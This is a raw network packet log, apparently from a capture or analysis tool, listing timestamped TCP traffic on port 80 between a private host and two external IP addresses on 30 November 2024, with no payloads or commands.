Nov 30, 2024 04:06:55.087491035 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.087579966 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.087631941 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.088515997 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.088610888 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.088630915 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.088716030 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.089611053 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.089730978 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.089761972 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.089772940 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.090650082 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.090706110 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.225950956 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.226022005 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.226032019 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.226120949 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.226385117 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.226438046 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.226622105 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.226716042 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.226756096 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.226804972 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.227718115 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.227771044 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.227859020 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.227909088 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.228800058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.228852987 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.228884935 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.228928089 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.229873896 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.229916096 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.230056047 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.230139017 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.230988026 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.231046915 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.231079102 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.231129885 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.232058048 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.232110023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.232163906 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.232217073 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.233127117 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.233227015 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.233289957 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.234230995 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.234283924 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.234296083 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.234349966 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.235338926 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.235390902 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.235445976 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.235497952 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.236414909 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.236466885 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.236506939 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.236628056 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.237477064 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.237595081 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.237684965 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.238575935 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.238622904 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.238749027 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.238794088 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.239650011 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.239705086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.239768982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.239816904 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.240741968 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.240796089 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.240837097 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.240931034 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.241837025 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.241888046 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.241950035 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.241998911 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.242909908 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.242954969 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.243026972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.243366957 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.244009018 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.244054079 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.244116068 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.244332075 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.245093107 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.245147943 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.245204926 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.245260000 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.246175051 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.246222973 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.246287107 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.246331930 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.247318029 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.247368097 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.247452974 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.247503996 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.248348951 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.248397112 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.248465061 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.248517036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.249445915 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.249500036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.249578953 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.249633074 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.250515938 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.250570059 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.250636101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.250689983 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.251610994 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.251660109 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.251796961 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.251846075 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.252706051 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.252757072 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.252796888 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.252850056 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.253937006 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.254034996 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.254041910 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.254087925 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.254867077 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.254926920 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.254990101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.255054951 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.255990982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.256041050 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.256115913 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.256165981 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.257064104 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.257181883 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.257227898 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.257289886 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.258135080 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.258244038 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.258244991 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.258291960 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.259224892 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.259275913 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.259305954 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.259356022 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.260324001 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.260375977 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.260423899 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.260477066 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.261409044 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.261461973 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.261529922 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.261584997 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.262489080 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.262543917 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.262592077 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.262643099 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.263588905 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.263669014 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.263685942 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.263817072 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.264667988 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.264724016 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.264755011 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.264866114 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.265757084 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.265810966 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.265860081 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.265911102 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.266822100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.266875982 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.266941071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.266993046 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.267911911 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.267965078 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.268016100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.268064022 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.269007921 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.269057035 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.269117117 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.269167900 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.270097017 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.270149946 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.270225048 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.270294905 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.271179914 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.271290064 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.272260904 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.272376060 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.272824049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.273350000 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.273406029 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.273458958 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.273540974 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.274436951 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.274488926 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.274545908 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.274605036 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.275532007 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.275578022 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.275646925 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.275691032 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.276638031 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.276691914 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.276740074 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.276840925 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.277713060 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.277760029 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.277817011 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.277868986 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.278793097 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.278841019 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.278940916 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.278992891 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.279884100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.279936075 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.279988050 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.280039072 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.280966043 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.281019926 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.281075001 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.281126022 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.282053947 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.282154083 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.282160997 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.282198906 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.375137091 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.413326025 CET	49894	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:55.417946100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.418000937 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.418010950 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.418062925 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.418464899 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.418515921 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.418565989 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.418662071 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.419538975 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.419589996 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.419642925 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.419697046 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.420630932 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.420689106 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.420737982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.420785904 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.421711922 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.421766043 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.421796083 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.421849966 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.422805071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.422861099 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.422924042 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.422975063 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.423880100 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.423929930 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.423994064 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.424045086 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.424994946 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.425044060 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.425110102 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.425162077 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.426099062 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.426150084 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.426218987 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.426270008 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.427160025 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.427285910 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.427586079 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.428257942 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.428306103 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.428371906 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.428430080 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.429321051 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.429373026 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.429436922 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.429487944 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.430413008 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.430463076 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.430511951 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.430562019 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.431508064 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.431638002 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.431662083 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.431808949 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.432621956 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.432667017 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.432737112 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.432823896 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.433686972 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.433739901 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.433779001 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.433830023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.434782028 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.434833050 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.434967041 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.435014963 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.435867071 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.435916901 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.435976982 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.436024904 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.436959028 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.437011957 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.437025070 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.437073946 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.438029051 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.438076973 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.438136101 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.438184023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.439106941 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.439210892 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.439214945 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.439270020 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.440211058 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.440263987 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.440294027 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.440345049 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.441293955 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.441344023 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.441374063 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.441423893 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.442373991 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.442424059 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.442472935 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.442523003 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.443466902 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.443516016 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.443564892 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.443618059 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.444547892 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.444596052 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.444652081 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.444703102 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.445633888 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.445681095 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.445739985 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.445787907 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.446712971 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.446835995 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.446890116 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.447808981 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.447863102 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.447947979 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.447999954 CET	49892	80	192.168.2.4	31.41.244.11
Nov 30, 2024 04:06:55.448913097 CET	80	49892	31.41.244.11	192.168.2.4
Nov 30, 2024 04:06:55.448962927 CET	49892	80	192.168.2.4	31.41.244.11
